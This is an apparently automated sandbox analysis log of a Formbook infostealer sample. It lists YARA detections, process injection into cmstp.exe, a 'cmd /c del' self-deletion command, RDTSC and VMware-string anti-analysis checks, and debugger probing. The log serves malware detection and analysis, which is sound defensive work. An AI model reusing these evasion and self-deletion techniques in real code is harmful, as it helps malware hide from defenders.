          Source: 00000007.00000002.474138939.00000000002D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.474138939.00000000002D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.256399693.00000000006B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.256399693.00000000006B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.220675052.000000001EB20000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.220675052.000000001EB20000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.256111645.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.256111645.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.475870538.0000000002840000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.475870538.0000000002840000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.LWlcpDjYIQ.exe.1eb20000.5.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.LWlcpDjYIQ.exe.1eb20000.5.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.LWlcpDjYIQ.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.LWlcpDjYIQ.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.LWlcpDjYIQ.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.LWlcpDjYIQ.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.LWlcpDjYIQ.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.LWlcpDjYIQ.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.LWlcpDjYIQ.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.LWlcpDjYIQ.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.LWlcpDjYIQ.exe.1eb20000.5.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.LWlcpDjYIQ.exe.1eb20000.5.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engine Classification label: mal100.troj.evad.winEXE@7/3@15/10
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 0_2_00404201 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 0_2_004020A6 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:400:120:WilError_01
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe File created: C:\Users\user\AppData\Local\Temp\nsmDEE2.tmp
          Source: LWlcpDjYIQ.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: LWlcpDjYIQ.exe ReversingLabs: Detection: 65%
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe File read: C:\Users\user\Desktop\LWlcpDjYIQ.exe
          Source: unknown Process created: C:\Users\user\Desktop\LWlcpDjYIQ.exe 'C:\Users\user\Desktop\LWlcpDjYIQ.exe'
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Process created: C:\Users\user\Desktop\LWlcpDjYIQ.exe 'C:\Users\user\Desktop\LWlcpDjYIQ.exe'
          Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\LWlcpDjYIQ.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeProcess created: C:\Users\user\Desktop\LWlcpDjYIQ.exe 'C:\Users\user\Desktop\LWlcpDjYIQ.exe'
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\LWlcpDjYIQ.exe'
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: cmstp.pdbGCTL source: LWlcpDjYIQ.exe, 00000002.00000002.256547466.0000000000960000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: LWlcpDjYIQ.exe, 00000000.00000003.210847086.000000001ECE0000.00000004.00000001.sdmp, LWlcpDjYIQ.exe, 00000002.00000002.256684216.0000000000B1F000.00000040.00000001.sdmp, cmstp.exe, 00000007.00000002.476522146.0000000004650000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: LWlcpDjYIQ.exe, cmstp.exe
          Source: Binary string: cmstp.pdb source: LWlcpDjYIQ.exe, 00000002.00000002.256547466.0000000000960000.00000040.00000001.sdmp

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Unpacked PE file: 2.2.LWlcpDjYIQ.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_0041535C push ebp; ret
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_0041B3F2 push eax; ret
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_0041B3FB push eax; ret
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_0041B3A5 push eax; ret
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_0041B45C push eax; ret
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00414EE8 push esi; ret
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A7D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_046CD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0285B3A5 push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0285B3F2 push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0285B3FB push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0285535C push ebp; ret
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_02854EE8 push esi; ret
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0285B45C push eax; ret
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | File created: C:\Users\user\AppData\Local\Temp\nsmDEE3.tmp\9a5t.dll
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmstp.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exe | RDTSC instruction interceptor: First address: 00000000028485E4 second address: 00000000028485EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exe | RDTSC instruction interceptor: First address: 000000000284896E second address: 0000000002848974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_004088A0 rdtsc
          Source: C:\Windows\explorer.exe TID: 4332 | Thread sleep time: -65000s >= -30000s
          Source: C:\Windows\SysWOW64\cmstp.exe TID: 5616 | Thread sleep time: -52000s >= -30000s
          Source: C:\Windows\SysWOW64\cmstp.exe | Last function: Thread delayed
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 0_2_0040531D DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 0_2_00405CB0 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 0_2_004026BC FindFirstFileA,
          Source: explorer.exe, 00000005.00000000.235946157.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.235946157.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000005.00000000.235733242.0000000008640000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.235267416.0000000008220000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000005.00000000.229986245.00000000055D0000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000005.00000002.475804173.0000000001438000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000005.00000000.235946157.000000000871F000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000005.00000000.235946157.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000005.00000000.236039343.00000000087D1000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000005.00000002.488038344.0000000005603000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000005.00000000.235267416.0000000008220000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000005.00000000.235946157.000000000871F000.00000004.00000001.sdmp | Binary or memory string: War&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.235267416.0000000008220000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000005.00000000.229143508.0000000004DF3000.00000004.00000001.sdmp | Binary or memory string: en_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qqqqqqqqqqqqqq
          Source: explorer.exe, 00000005.00000000.235267416.0000000008220000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\cmstp.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00409B10 LdrLoadDll,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 0_2_737F1000 Hyvkfcorf,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 0_2_0291160D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 0_2_02911825 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A690AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A5F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A5F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A29080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00AA3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A240E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A258EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00ABB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00ABB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A5002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A3B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00AF4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00AA7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00AF1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00AE2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A40050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A561A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00AE49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00AA69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00AA51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A5A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A4C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A52990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A2B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00AB41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A44120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A44120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A5513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A29100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A2C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A2B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A4B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A3AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A5FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A5D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A52AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A52ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A64A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A38A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A25210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A25210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A2AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A43A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00AEAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00ADB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00AF8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A6927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A29240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00AEEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00AB4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A54BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00AF5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00AE138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A31B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00ADD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A52397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A5B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A4DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00AA53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00AE131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A2DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A53B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A2DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00AF8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A2F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A3849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00AE14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00AA6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00AF8CD6 mov eax, dword ptr fs:[00000030h]
